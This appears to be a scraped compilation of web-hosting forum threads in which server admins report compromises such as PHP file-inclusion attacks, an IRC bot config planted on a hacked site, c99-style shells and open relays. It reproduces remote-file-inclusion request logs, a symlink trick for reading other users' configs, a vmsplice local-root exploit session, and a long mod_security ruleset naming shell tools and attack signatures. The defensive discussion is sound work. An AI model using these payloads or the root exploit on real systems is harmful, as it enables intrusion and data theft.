Open BSD Remote Exploit
Mar 15, 2007posted today in slashdot, after over 10 years no remote exploit, ...
[url]
posted today in slashdot, after over 10 years no remote exploit, ...
[url]
I read about a new exploit that imbeds PHP code in a GIF file:
[url]
How would that work exactly? Wouldn't a server have to be set up specifically to parse PHP code in gif files? Who would set up their server that way? Is there a way around that so you can remotely trick the server into parsing gif files as PHP code?
check this out [url]
That could do some damage, all someone would have to do is get shell on a site or be able to see config.php and then connect with that database and mass deface the server or put shells on other sites.
Anyone know of any way to prevent this?
Just discovered a php exploit on a client's domain.
Found this in the access_log
[url]
=
[url]
Take a look at rmod.txt
[url]
then found this in a conf.txt in the /pearus/.bash folder
Quote:
statefile Infodll.state
connectionmethod direct
server animefox.no-ip.biz 6666
server animefox.no-ip.biz 6667
server animefox.no-ip.biz 6668
server animefox.no-ip.biz 6669
server animefox.no-ip.biz 7000
server animefox2.no-ip.biz 6666
server animefox2.no-ip.biz 6667
server animefox2.no-ip.biz 6668
server animefox2.no-ip.biz 6669
server animefox2.no-ip.biz 7000
server animefox.no-ip.biz 6666
server animefox.no-ip.biz 6667
server animefox.no-ip.biz 6668
server animefox.no-ip.biz 6669
server animefox.no-ip.biz 7000
server animefox2.no-ip.biz 32000
server animefox2.no-ip.biz 40000
server animefox2.no-ip.biz 42000
server animefox2.no-ip.biz 44000
server animefox2.no-ip.biz 48000
channel ###Snake###
channel #PoIsOn_MuSiC
adminpass f2oL8zmnIG/CA
user_nick PoIsOn|MuSiC|030
#local_vhost 123.456.789.123
#tcprangestart 4000
#usenatip 123.456.789.123
user_realname ...::::9PoIsOn CrEw::::...
user_modes +ix
loginname r0x
slotsmax 10
queuesize 30
maxtransfersperperson 1
maxqueueditemsperperson 2
restrictlist yes
restrictprivlist no
restrictsend yes
restrictprivlistmsg Per la lista [url]
respondtochannelxdcc no
respondtochannellist no
headline 9,2 ..::4T11h0e 13B9e11S7t 4C11h9a8n7n8e7L 11O4f 11T7h4e 8W13o8r9l7D11::..
creditline 9,2 ..::4T11h0e 13B9e11S7t 4C11h9a8n7n8e7L 11O4f 11T7h4e 8W13o8r9l7D11::..
adminhost *!*@PoIsOn.CrEw
adminhost SilverFox!*@*.*
uploadhost *!*@PoIsOn.CrEw
uploadhost *!*@P.o.I.s.O.n
downloadhost *!*@*.*
hideos yes
filedir /home/httpd/vhosts/domain.com/httpdocs/pearus/.bash
uploaddir /home/httpd/vhosts/domain.com/httpdocs/pearus/.bash
#
contents of the .bash folder:
Quote:
-rw-r--r-- 1 apache apache 1729 Nov 23 11:44 conf.txt
-rwxr-xr-x 1 apache apache 214350 Nov 5 06:01 httpd
-rwxr-xr-x 1 apache apache 214382 Nov 5 06:01 httpd_chroot
-rw-r--r-- 1 apache apache 268 Nov 25 13:25 Infodll.state
-rw-r--r-- 1 apache apache 268 Nov 25 13:23 Infodll.state~
-rw-r--r-- 1 apache apache 268 Nov 19 06:12 mybot.state
-rw-r--r-- 1 apache apache 268 Nov 19 06:09 mybot.state~
-rw-r--r-- 1 apache apache 604160 Sep 23 09:07 Poi.tar
-rwxrwxrwx 1 apache apache 41 Nov 25 10:52 restart
Still trying to dig in some more to figure out how they were able to exploit
here's the first few lines of their blog.php
Quote:
<?php
session_cache_limiter('none');
session_start();
ob_start();
?>
<?php include_once("oneadmin/config.php");
include_once($path["docroot"]."common/session.php"); ?>
several of our dedicated servers got hacked,(NOT rooted), but many of sites on each server got hacked.
after tracing the hacking process, we found that the hacker only put a "perl" file contain:
++++++++++cut here+++++++++
symlink("/link/to/victim/configs","/link/to/local/hacker/site");
+++++++++++cut here++++++++++++
and then we found many links of victim config files on the local hacker site!
all servers runing with:
-php 4.4.7
-centos 4.5
-cpanel
i tried to do the same way by a normal user, but i get the "Permission denied" error and i can not read the linked files!
so how can i prevent the function "symlink" from executing using perl?
is there any new exploit in php/perl?
My provider sent me an abuse ticket with the message below. This is a cPanel server with 300 domains. How do I go about tracking down the problem? They can’t give me anymore information and I don’t know where else to look.
This ticket was automatically generated by the XXXXXXXXXXXXXX Network Protection System. An unusual amount of traffic has been detected involving your IP address xx.xx.xx.xx.
Details of the event follow:
3885: HTTP: PHP File Include Exploit
This filter detects an attempt to post the contents of an external script to a PHP application. This behavior is typical of a PHP file include vulnerability attack. This attack could allow an attacker to insert custom code into a variable that would be executed by all users of the vulnerable application.
CSF install the new version, I warned that the option Check for cxs. I had a few questions!
1 - is it free? And can be installed and will work?
2 - I like these things are additional to the installation?
3 - a bit about this new possibility to explain how to solve the case to get out of the red.
How Can i translate An Kernel Exploit to secure my server like that
[url]
how can i now what i do to my server if i see any exploit
Has anyone has to deal with a recent exploit of TikiWiki (comes as one of the available Fantastico scripts)? I found my server had been compromised quite by accident. I was Googleing my domain just to see what came up and found a bunch of pages with links to Porn sites that were in some sub directories in my TikiWiki install. This article discusses:
[url]
Just wondering if anyone here has had to deal with this and if there in anything else I should do that is not discussed in thie article?
have found open servers and are trying to execute:
Site: MYSite (mydomain.com)
Error Code: 404 Missing URL ()
Occurred: Tue Jun 10 17:57:20 MDT 2008
Requested URL: //mypanel/clientarea.php?action=[url]
User Address: 67.15.183.164
User Agent: libwww-perl/5.805
Referer:
"Alartist" seems to be an Arabic site while the IP seems to be hosted by the Planet.
Anyone else seeing these?
I have been having trouble with my server lately sending out a lot of emails and I thought I had tracked it down to people taking advantage of some mailing lists which I took care of.
What I ran into today is I have a business where I send out emails using a php script in our shopping cart. Well I got a lot of failure emails back that caught my attention. They have about 200 random email listings that are not in my database saying why they can't be delivered and then a copy of the actual newsletter that I just sent today.
So is it possible that some where something is injecting this BCC field into the php mail()? If so, is there something that I can do to find this script?
Box is set to poplock 20min, smtp auth on, firewall has been up for years, chkrootkit is clean.
I've been checking my logs and I'm seeing a TON of referers like...
Quote:
Originally Posted by Logs
[url]
Is this some kind of new Cpanel exploit?
I think i have a security problem about my server. I have centos4.4 2gb ram of server. Plesk 8.1 control panel
It is a dedicated server. Http crashed and when i want to restart apache it give address already in use error. Then while i was googling for solution for this, i found a solution and check which service is using that port and i saw r0nin there
I dont know if it is an exploit or how it infected and how to solve. I attached a screenshot below.
I will be glad if you can give me some more information about it. Also i am using apf as firewall on my server
There has been some hacker group out there on the net hacking lots of servers. Some of which I knew the admins/owners and they were not stupid people and kept their server up to date as well as using grsecurity kernels, selinux, assorted firewalls, etc. In other words they done what most of us do trying to keep their server as secure as possible.
But it done them no good as the hackers were able to get root access in minutes on linux and freebsd servers. After looking into it and asking around supposedly these hackers have a 0day remote root exploit for bind.
Anyone heard of this and does it seem plausible?
The bind that comes with cpanel and directadmin is BIND 9.3.3rc2 which is pretty old even compared to default rhel packages which are 9.42 now. Does anyone know why cpanel and da have bind excluded form being updated in yum? And what would be the harm in upgrading? Has anyone here upgraded their bind?
I'm having a recurring issue where someone is getting a script into /tmp, taking down the webserver and setting up their stupid IRC bot on port 80. It's annoying because thus far I have not been able to track them down. As soon as it happens I'm combing through the logs trying to find out what PHP script (probably PHPBB or something like it from one of my customers) is letting them through but there is nothing in the logs. I've had this happen before but usually there's some trace in the logs like some ASCII encoded string. Right now I just have little to nothing to go on and it's quite annoying. I've combed all over the net but found next to nothing. RKHunter doesn't even know it exists.
View 11 Replies View RelatedHas anyone encountered server being infected with Exploit.HTML.IESlice.bz
My server is infected with this new rootkit. Is the 'OS reload' only the solution?
Lately, our server logs are being filled with requests from exploited servers. In order to prevent our servers from being hacked, I have tried to harden the server as much as possible. (Server: Centos 4.6, Apache 2, PHP 5, MySql 5, Cpanel/WHM)
I have detailed my efforts and would appreciate some feed back or suggestions of your own that have been effective.
-------------
Examples include c99.txt exploits, php insertions, etc.
Recent Sample Logs:
Code:
66.246.246.38 - - [30/Jan/2008:16:32:59 -0500] "GET /example.cgi?SearchIndex=http%3A%2F%2Fwww.soeasywebsite.com%2Fsoeasycasino%2Fmaj%2Fpepus%2F&Manufacturer=Black+&+Decker HTTP/1.0" 406 442 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
Code:
64.38.19.90 - - [25/Jan/2008:04:35:22 -0500] "GET /post/index/7//bm/mail.php?id=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 406 464 "-" "libwww-perl/5.808"
Code:
207.44.154.126 - - [01/Feb/2008:01:36:12 -0500] "GET /index.php?act=http%3A%2F%2Fwww.qubestunes.com%2Fte%2Fratov%2Fomuley%2F&id=2 HTTP/1.0" 200 139303 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
What to do to prevent these intrusions?
1) I have updated my Mod_Security rules (running version modsec2) to include checks for the following:
Code:
# Check Content-Length and reject all non numeric ones
SecRule REQUEST_HEADERS:Content-Length "!^d+$" "deny,log,auditlog,msg:'Content-Length HTTP header is not numeric', severity:'2',id:'960016'"
# Do not accept GET or HEAD requests with bodies
SecRule REQUEST_METHOD "^(GET|HEAD)$" "chain,deny,log,auditlog,msg:'GET or HEAD requests with bodies', severity:'2',id:'960011'"
SecRule REQUEST_HEADERS:Content-Length "!^0?$"
# Require Content-Length to be provided with every POST request.
SecRule REQUEST_METHOD "^POST$" "chain,deny,log,auditlog,msg:'POST request must have a Content-Length header',id:'960012',severity:'4'"
SecRule &REQUEST_HEADERS:Content-Length "@eq 0"
# Don't accept transfer encodings we know we don't know how to handle
SecRule HTTP_Transfer-Encoding "!^$" "deny,log,auditlog,msg:'ModSecurity does not support transfer encodings',id:'960013',severity:'5'"
# Check decodings
SecRule REQUEST_FILENAME|ARGS|ARGS_NAMES|REQUEST_HEADERS|
REQUEST_HEADERS:Referer "@validateUrlEncoding"
"chain, deny,log,auditlog,msg:'URL Encoding Abuse Attack Attempt',id:'950107',severity:'4'"
SecRule REQUEST_FILENAME|ARGS|ARGS_NAMES|REQUEST_HEADERS|!REQUEST_HEADERS:Referer "\%(?![0-9a-fA-F]{2}|u[0-9a-fA-F]{4})"
# Proxy access attempt
SecRule REQUEST_URI ^http:/ "deny,log,auditlog,msg:'Proxy access attempt', severity:'2',id:'960014'"
#
# Restrict type of characters sent
SecRule REQUEST_FILENAME|REQUEST_HEADERS_NAMES|REQUEST_HEADERS|!REQUEST_HEADERS:Referer
"@validateByteRange 1-255"
"log,auditlog,msg:'Request Missing an Accept Header', severity:'2',id:'960015',t:urlDecodeUni,phase:1"
SecRule ARGS|ARGS_NAMES "@validateByteRange 1-255"
"deny,log,auditlog,msg:'Invalid character in request',id:'960901',severity:'4',t:urlDecodeUni,phase:2"
# allow request methods
SecRule REQUEST_METHOD "!^((?:(?:POS|GE)T|OPTIONS|HEAD))$"
"phase:1,log,auditlog,msg:'Method is not allowed by policy', severity:'2',id:'960032'"
# Restrict file extension
# removed exe so that frontpage will work
# Restricted HTTP headers
SecRule REQUEST_HEADERS_NAMES ".(?:Lock-Token|Translate|If)$"
"deny,log,auditlog,msg:'HTTP header is restricted by policy',id:'960038',severity:'4'"
SecRule HTTP_User-Agent "(?:(?:m(?:ozilla/4.0 (compatible)|etis)|webtrends security analyzer|pmafind)|n(?:-stealth|sauditor|essus|ikto)|b(?:lack ?widow|rutus|ilbo)|(?:jaascoi|paro)s|internet explorer|webinspect|.nasl)"
"deny,log,auditlog,msg:'Request Indicates a Security Scanner Scanned the Site',id:'990002',severity:'2'"
SecRule REQUEST_HEADERS_NAMES "acunetix-product"
"deny,log,auditlog,msg:'Request Indicates a Security Scanner Scanned the Site',id:'990901',severity:'2'"
SecRule REQUEST_FILENAME "^/nessustest"
"deny,log,auditlog,msg:'Request Indicates a Security Scanner Scanned the Site',id:'990902',severity:'2'"
SecRule REQUEST_HEADERS:User-Agent "(?:m(?:ozilla/(?:4.0 (compatible; advanced email extractor|2.0 (compatible; newt activex; win32))|ailto:craftbot@yahoo.com)|e(?:mail(?:(?:collec|harves|magne)t|(?: extracto|reape)r|siphon|wolf)|(?:collecto|irgrabbe)r|xtractorpro|o browse)|a(?:t(?:tache|hens)|utoemailspider|dsarobot)|w(?:eb(?:emailextrac| by mail)|3mir)|f(?:astlwspider|loodgate)|p(?:cbrowser|ackrat|surf)|(?:digout4uagen|takeou)t|(?:chinacla|be)w|hhjhj@yahoo|rsync|shai|zeus)"
"deny,log,auditlog,msg:'Rogue web site crawler',id:'990012',severity:'2'"
SecRule REQUEST_HEADERS:User-Agent "(?:(?:(?:indy librar|snoop)y|microsoft url control|lynx)|d(?:ownload demon|isco)|w(?:3mirror|get)|l(?:ibwww|wp)|p(?:avuk|erl)|cu(?:sto|rl)|big brother|autohttp|netants|eCatch)"
"chain,log,auditlog,msg:'Request Indicates an automated program explored the site',id:'990011',severity:'5'"
SecRule REQUEST_HEADERS:User-Agent "!^apache.*perl"
# Session fixation
SecRule REQUEST_FILENAME|ARGS|ARGS_NAMES|REQUEST_HEADERS|!REQUEST_HEADERS:Referer "(?:.cookie.*?;W*?(?:expires|domain)W*?=|http-equivW+set-cookie)"
"capture,ctl:auditLogParts=+E,log,auditlog,msg:'Session Fixation. Matched signature <%{TX.0}>',id:'950009',severity:'2'"
# Blind SQL injection
SecRule REQUEST_FILENAME|ARGS|ARGS_NAMES|REQUEST_HEADERS|!REQUEST_HEADERS:Referer "(?:(?:(?:s(?:ys.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect.{0,40}(?:substring|ascii|user))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql.user)|c(?:onstraint_type|harindex)|attnotnull)|(?:locate|instr)W+()|@@spid)"
"capture,t:replaceComments,ctl:auditLogParts=+E,log,auditlog,msg:'Blind SQL Injection Attack. Matched signature <%{TX.0}>',id:'950007',severity:'2'"
SecRule REQUEST_FILENAME|ARGS|REQUEST_HEADERS|!REQUEST_HEADERS:Referer "(?:(?:s(?:ys(?:(?:(?:process|tabl)e|filegroup|object)s|c(?:o(?:nstraint|lumn)s|at)|dba|ibm)|ubstr(?:ing)?)|user_(?:(?:(?:constrain|objec)t|tab(?:_column|le)|ind_column|user)s|password|group)|a(?:tt(?:rel|typ)id|ll_objects)|object_(?:(?:nam|typ)e|id)|pg_(?:attribute|class)|column_(?:name|id)|(?:dba|mb)_users|xtypeW+char|rownum)|t(?:able_name|extposW+())"
"capture,t:replaceComments,ctl:auditLogParts=+E,log,auditlog,msg:'Blind SQL Injection Attack. Matched signature <%{TX.0}>',id:'950904',severity:'2'"
# SQL injection
SecRule REQUEST_FILENAME|ARGS|ARGS_NAMES|REQUEST_HEADERS|!REQUEST_HEADERS:Referer "(?:(?:(?:s(?:elect(?:.{1,100}?(?:(?:length|count|top).{1,100}?from|from.{1,100}?where)|.*?(?:d(?:ump.*from|ata_type)|(?:to_(?:numbe|cha)|inst)r))|p_(?:(?:addextendedpro|sqlexe)c|(?:oacreat|prepar)e|execute(?:sql)?|makewebtask)|ql_(?:longvarchar|variant))|xp_(?:reg(?:re(?:movemultistring|ad)|delete(?:value|key)|enum(?:value|key)s|addmultistring|write)|e(?:xecresultset|numdsn)|(?:terminat|dirtre)e|availablemedia|loginconfig|cmdshell|filelist|makecab|ntsec)|u(?:nion.{1,100}?select|tl_(?:file|http))|group.*by.{1,100}?having|loadW*?data.*infile|(?:n?varcha|tbcreato)r|autonomous_transaction|open(?:rowset|query)|dbms_java)|i(?:n(?:toW*?(?:dump|out)file|sertW*?into|nerW*?join)|(?:f(?:W*?(W*?benchmark|null)|snull)W*?()|(?:having|or|and)s+?(?:d{1,10}|'[^=]{1,10}')s*?[=<>]+|(?:print]W*?@|root)@|c(?:astW*?(|oalesce))|(?:;W*?(?:shutdown|drop)|@@version)|'(?:s(?:qloledb|a)|msdasql|dbo)')"
"capture,t:replaceComments,ctl:auditLogParts=+E,log,auditlog,msg:'SQL Injection Attack. Matched signature <%{TX.0}>',id:'950001',severity:'2'"
SecRule REQUEST_FILENAME|ARGS|REQUEST_HEADERS|!REQUEST_HEADERS:Referer "(?:user_(?:(?:object|table|user)s|password|group)|a(?:tt(?:rel|typ)id|ll_objects)|object_(?:(?:nam|typ)e|id)|pg_(?:attribute|class)|column_(?:name|id)|substr(?:ing)?|table_name|mb_users|rownum)"
"capture,t:replaceComments,ctl:auditLogParts=+E,log,auditlog,msg:'SQL Injection Attack. Matched signature <%{TX.0}>',id:'950906',severity:'2'"
# XSS
SecRule REQUEST_FILENAME|ARGS|ARGS_NAMES|REQUEST_HEADERS "(?:(?:on(?:(?:mo(?:use(?:o(?:ver|ut)|down|move|up)|ve)|key(?:press|down|up)|c(?:hange|lick)|s(?:elec|ubmi)t|(?:un)?load|dragdrop|resize|focus|blur)W*?=|abort)|(?:l(?:owsrcW*?(?:(?:java|vb)script|shell)|ivescript)|(?:href|url)W*?(?:(?:java|vb)script|shell)|background-image|mocha):|typeW*?(?:text(?:W*?(?:j(?:ava)?|ecma)script| [vbscript])|applicationW*?x-(?:java|vb)script)|s(?:(?:tyleW*=.*expressionW*|ettimeoutW*?)(|rcW*?(?:(?:java|vb)script|shell|http):)|(?:c(?:opyparentfolder|reatetextrange)|get(?:special|parent)folder)|a(?:ctivexobject|lertW*?())|<(?:(?:body.*?(?:backgroun|onloa)d|input.*?typeW*?image)|![CDATA[|script|meta)|(?:.(?:(?:execscrip|addimpor)t|(?:fromcharcod|cooki)e|innerhtml)|@import))"
"capture,ctl:auditLogParts=+E,log,auditlog,msg:'Cross-site Scripting (XSS) Attack. Matched signature <%{TX.0}>',id:'950004',severity:'2'"
# file injection
SecRule REQUEST_FILENAME|ARGS|ARGS_NAMES|REQUEST_HEADERS "(?:(?:.(?:ht(?:access|passwd|group)|www_?acl)|global.asa|httpd.conf|boot.ini)|/etc/)"
"capture,ctl:auditLogParts=+E,deny,log,auditlog,msg:'Remote File Access Attempt. Matched signature <%{TX.0}>',id:'950005',severity:'2'"
# Command access
SecRule REQUEST_FILENAME "(?:n(?:map|et|c)|w(?:guest|sh)|cmd(?:32)?|telnet|rcmd|ftp).exe"
"capture,ctl:auditLogParts=+E,deny,log,auditlog,msg:'System Command Access. Matched signature <%{TX.0}>',id:'950002',severity:'2'"
# Command injection
SecRule ARGS|ARGS_NAMES|REQUEST_HEADERS "(?:(?:(?:n(?:et(?:W+?localgroup|.exe)|(?:map|c).exe)|t(?:racer(?:oute|t)|elnet.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp).exe|echoW*?y+)|c(?:md(?:(?:32)?.exe|W*?/c)|d(?:W*?[/]|W*?..)|hmod.{0,40}?+.{0,3}x))|[;|`]W*?(?:(?:c(?:h(?:grp|mod|own|sh)|md|pp|c)|p(?:asswd|ython|erl|ing|s)|n(?:asm|map|c)|f(?:inger|tp)|(?:kil|mai)l|(?:xte)?rm|ls(?:of)?|telnet|uname|echo|id)|g(?:++|cc))|/(?:c(?:h(?:grp|mod|own|sh)|pp|c)|p(?:asswd|ython|erl|ing|s)|n(?:asm|map|c)|f(?:inger|tp)|(?:kil|mai)l|g(?:++|cc)|(?:xte)?rm|ls(?:of)?|telnet|uname|echo|id)(?:['"|;`-s]|$))"
"capture,ctl:auditLogParts=+E,deny,log,auditlog,msg:'System Command Injection. Matched signature <%{TX.0}>',id:'950006',severity:'2'"
SecRule "ARGS|ARGS_NAMES|REQUEST_HEADERS|!REQUEST_HEADERS:User-Agent"
"wget"
"capture,ctl:auditLogParts=+E,deny,log,auditlog,msg:'System Command Injection. Matched signature <%{TX.0}>',id:'950907',severity:'2'"
# SSI injection
SecRule REQUEST_FILENAME|ARGS|ARGS_NAMES|REQUEST_HEADERS "<!--W*?#W*?(?:e(?:cho|xec)|printenv|include|cmd)"
"capture,ctl:auditLogParts=+E,deny,log,auditlog,msg:'SSI injection Attack. Matched signature <%{TX.0}>',id:'950011',severity:'2'"
# PHP injection
SecRule REQUEST_FILENAME|ARGS|ARGS_NAMES|REQUEST_HEADERS "(?:(?:(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open)|$_(?:(?:pos|ge)t|session))|<?(?!xml))"
"capture,ctl:auditLogParts=+E,deny,log,auditlog,msg:'PHP Injection Attack. Matched signature <%{TX.0}>',id:'950013',severity:'2'"
#suntzu
SecRule REQUEST_URI|REQUEST_BODY|HTTP_Content-Disposition "/(suntzu.*|suntzu).php?cmd="
#Known rootkits
SecRule REQUEST_URI|REQUEST_BODY "perl (xpl.pl|kut|viewde|httpd.txt)"
SecRule REQUEST_URI|REQUEST_BODY "./xkernel;"
SecRule REQUEST_URI|REQUEST_BODY "/kaiten.c"
SecRule REQUEST_URI|REQUEST_BODY "/mampus?&(cmd|command)"
# WEB-MISC .htpasswd access
SecRule REQUEST_URI ".htpasswd"
# WEB-MISC /etc/passwd access
SecRule REQUEST_URI "/etc/passwd"
#Exploit agent
SecRule HTTP_User-Agent "Mosiac 1.*"
#remote bash shell
SecRule REQUEST_URI "/shell.php&cmd="
SecRule ARGS "/shell.php&cmd="
# WEB-CGI formmail
SecRule REQUEST_URI "/(formmail|mailform)(x0a|.plx0a)"
#Invision Board ipchat.php file include
SecRule REQUEST_URI "/hk/ipchat.php*root_path*conf_global.php"
#Invision Power Board SQL injection
SecRule REQUEST_URI "/hk/index.php?act=.*&max_results=.*&filter=.*&sort_order=.*&sort_key=.*&st=*(UNION|SELECT|DELETE|INSERT)"
#Invision Gallery SQL Injection Vulnerabilities
SecRule REQUEST_URI "/hk/index.php" chain
SecRule ARGS:comment "(select|grant|delete|insert|drop|do|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[A-Z|a-z|0-9|*| ]+[[:space:]](from|into|table|database|index|view)"
# TIKIWIKI
SecRule REQUEST_URI "/tiki-map.phtml?mapfile=../../"
#Wordpress shell injection Vulnerability
SecRule REQUEST_URI "/cache/user.*/.*.php?cmd=" "id:390064,rev:1,severity:2,msg:'JITP: Wordpress shell injection Vulnerability'"
#Bad agent
SecRule HTTP_User-Agent "Brutus/AET"
#Web leaches
SecRule HTTP_User-Agent "Linux"
SecRule HTTP_User-Agent "libcurl-agent"
SecRule HTTP_User-Agent "TurnitinBot"
SecRule HTTP_User-Agent "ANONYMOUS"
SecRule HTTP_User-Agent "LinkWalker"
SecRule HTTP_User-Agent "Drecombot"
SecRule HTTP_User-Agent "Mac Finder"
SecRule HTTP_User-Agent "ConveraCrawler"
SecRule HTTP_User-Agent "WebarooBot"
SecRule HTTP_User-Agent "RufusBot"
SecRule HTTP_User-Agent "SumeetBot"
SecRule HTTP_User-Agent "pulseBot"
SecRule HTTP_User-Agent "FyberSpider"
SecRule HTTP_User-Agent "1-More Scanner v1.25"
SecRule HTTP_User-Agent "DRT-ResolveBot-Ignore"
SecRule HTTP_User-Agent "T-H-U-N-D-E-R-S-T-O-N-E"
SecRule HTTP_User-Agent "SnapPreviewBot"
SecRule HTTP_User-Agent "IRLbot"
SecRule HTTP_User-Agent "Charlotte"
SecRule HTTP_User-Agent "ninetowns"
SecRule HTTP_User-Agent "heritrix"
SecRule HTTP_User-Agent "Python-urllib"
SecRule HTTP_User-Agent "InetURL"
SecRule HTTP_User-Agent "cazoodle"
SecRule HTTP_User-Agent "DepSpid" "deny,nolog,status:410"
SecRule HTTP_User-Agent "Browsezilla"
SecRule HTTP_User-Agent "MetagerBot"
SecRule HTTP_User-Agent "TALWinHttpClient"
SecRule HTTP_User-Agent "Snapbot"
SecRule HTTP_User-Agent "BDFetch"
SecRule HTTP_User-Agent "WebaltBot"
SecRule HTTP_User-Agent "VSynCrawler"
SecRule HTTP_User-Agent "UbiCrawler"
SecRule HTTP_User-Agent "WebCapture"
SecRule HTTP_User-Agent "WebCopier"
SecRule HTTP_User-Agent "FairAd Client"
SecRule HTTP_User-Agent "Black Hole"
SecRule HTTP_User-Agent "Crescent"
SecRule HTTP_User-Agent "MIIxpc"
SecRule HTTP_User-Agent "Harvest"
SecRule HTTP_User-Agent "LinkextractorPro"
SecRule HTTP_User-Agent "Snoopy"
SecRule HTTP_User-Agent "IDBot"
SecRule HTTP_User-Agent "Cyveillance" "deny,nolog,status:404"
SecRule HTTP_User-Agent "PEAR HTTP_Request class"
SecRule HTTP_User-Agent "libwww-perl"
11) Review my logs daily to look for problem child scrapers, hackers, and issues.
one of my client account has just been hacked with c.100 exploit. This method injects 1 php file that acts like fully featured file manager. This hacker use my client account to place multiple scam & phissing sites
now i'm wondering if this kind of exploit hacking have a way to counter them as my friend that there aren't any proved method untill now :-/
This is the php file i've recovered:
<<url removed>>
FYI, my server configuration:
- apache 2.2.11
- centos 5.2
- cpanel + whm 11.24.4
- suphp, clamav & modsec enabled
one of my clients seems to be attracting unwanted attention, it seems as if bots or something along those lines are attempting to exploit my box, while they are unsuccessful it would seem. I was wdonering if there was a rule I could put in Mod_Security that would ban them for attempting to
GET "/awstatsf/logger.php?action=log&type=Hybrid&host=hacked101&"
One of my servers is running Apache 1.3.34 (Unix), and I recently noticed that there was a rather large mod_rewrite security exploit found:
[url]
I can't seem to figure out if this affects me with the version I am running? Can anyone help me out on this to determine if I need to upgrade or if I am already patched up?
Get ready for another round of patching and reboots. See:
[url]
Linux vmsplice Local Root Exploit
By qaaz
Linux 2.6.17 - 2.6.24.1
Debian also has a report but I'm trying to avoid linking to the source of the exploit. It works on 2.6.24, but only once. Then the box kernel panics (did for me). 2.6.24.1 is out as of couple days ago, but I'm not sure if it's still vulnerable. Seems like it is.
luki@tester:/tmp$ gcc t.c -o t
luki@tester:/tmp$ ./t
-----------------------------------
Linux vmsplice Local Root Exploit
By qaaz
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7e6f000 .. 0xb7ea1000
[+] root
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
root@tester:/tmp# id
uid=0(root) gid=0(root) groups=0(root)
root@tester:/tmp#
This has been happening for about 6 months, someone has been exploiting my windows server and causing 300 php.exe processes to run, therefore making the CPU usage go to 100% and cause all php sites to not function. It is a perl script, and I had gotten ahold of the explot, but am unsure how to block it,
what the following is doing, and how to block it.. once I find the script again I will add it to the post..
I am using Plesk on my box.
I always recieve this email: from lfd
Time: Tue Apr 29 03:40:13 2008
Possible detection of "Random JS Toolkit"
Failed to create test directory /etc/csf/1: No space left on device:
See [url] for more information
I do this to test if my server is infected:
mkdir /home/1
it created without any problems
and I used tcpdump and I got this:
<script type="text/javascript" src='jscripts/ips_ipsclass.js'></script>
<script type="text/javascript" src='jscripts/ipb_global.js'></script>
<script type="text/javascript" src='cache/lang_cache/en/lang_javascript.js'></script>
<script type="text/javascript" src='jscripts/ips_xmlhttprequest.js'></script>
<script type="text/javascript" src='jscripts/ipb_global_xmlenhanced.js'></script>
is that mean the server is infected? but these scripts are for the IPB forum board so why I still recieve this email?
i update the cpanel and after that lfd fails all the time
ct 22 11:53:21 *** lfd[1653]: *System Exploit* has detected a possible "Random JS Toolkit" - Failed to create test directory /etc/csf/1: Disk quota exceeded
Oct 22 11:53:21 *** lfd[1653]: Error: Cannot open out file: Disk quota exceeded, at line 3780
Oct 22 11:53:21 *** lfd[1653]: daemon stopped
Oct 22 11:53:26 *** lfd[30079]: Error: pid mismatch or missing, at line 589
Oct 22 11:53:26 *** lfd[30079]: daemon stopped
Which can be the issue you think ?
Ip tables in my case all of them they are correct
Even if i restart the virtual its working properly for a while and after that fails
Can someone recommended me some one with knowledge of mysql exploit or mysql injection, it seem to our VB forum have issue with database load..
View 5 Replies View Relatedhow to transfer file(s) from remote server to remote ftp using ssh(on remote server)?
View 3 Replies View RelatedI have windows servers that I'll be co-locating very soon. I have purchased a Dell 2161ds-2 and an APC remote boot power strip. Could someone please tell me the best way to secure remote access to these products. Do I put them on public IP's and allow them through the firewall or do I put them behind the firewall and access them after I authenticate through the firewall.
View 6 Replies View RelatedIs there a way to exploit openssl? someone came to me asking me for a job on hostparlor.com and i said no. They then uploaded a remote view script to exploit perl and gain access. I patched that. Then he again said that he can exploit through openssl. I thaught open ssl was security itself? He then told me that he can gain access through php sites to root? Is that possible? We have phpsafemode set to off because we run whmcs and it requires it to be off. He said he can hack us through that aswell. Is this guy just bluffing or can this seriously be done? Like i said this is why i have 2 server admins...
View 4 Replies View RelatedSomehow I've opened up my postfix server to act as an open relay and it's already being taken advantage of. The following is my postconf
2bounce_notice_recipient = postmaster
access_map_reject_code = 554
address_verify_default_transport = $default_transport
address_verify_local_transport = $local_transport
address_verify_map =
address_verify_negative_cache = yes
address_verify_negative_expire_time = 3d
address_verify_negative_refresh_time = 3h
address_verify_poll_count = 3
address_verify_poll_delay = 3s
address_verify_positive_expire_time = 31d
address_verify_positive_refresh_time = 7d
address_verify_relay_transport = $relay_transport
address_verify_relayhost = $relayhost
address_verify_sender = postmaster
address_verify_sender_dependent_relayhost_maps = $sender_dependent_relayhost_maps
address_verify_service_name = verify
address_verify_transport_maps = $transport_maps
address_verify_virtual_transport = $virtual_transport
alias_database = hash:/etc/aliases
alias_maps = hash:/etc/aliases
allow_mail_to_commands = alias, forward
allow_mail_to_files = alias, forward
allow_min_user = no
allow_percent_hack = yes
allow_untrusted_routing = no
alternate_config_directories =
always_bcc =
anvil_rate_time_unit = 60s
anvil_status_update_time = 600s
append_at_myorigin = yes
append_dot_mydomain = yes
application_event_drain_time = 100s
authorized_flush_users = static:anyone
authorized_mailq_users = static:anyone
authorized_submit_users = static:anyone
backwards_bounce_logfile_compatibility = yes
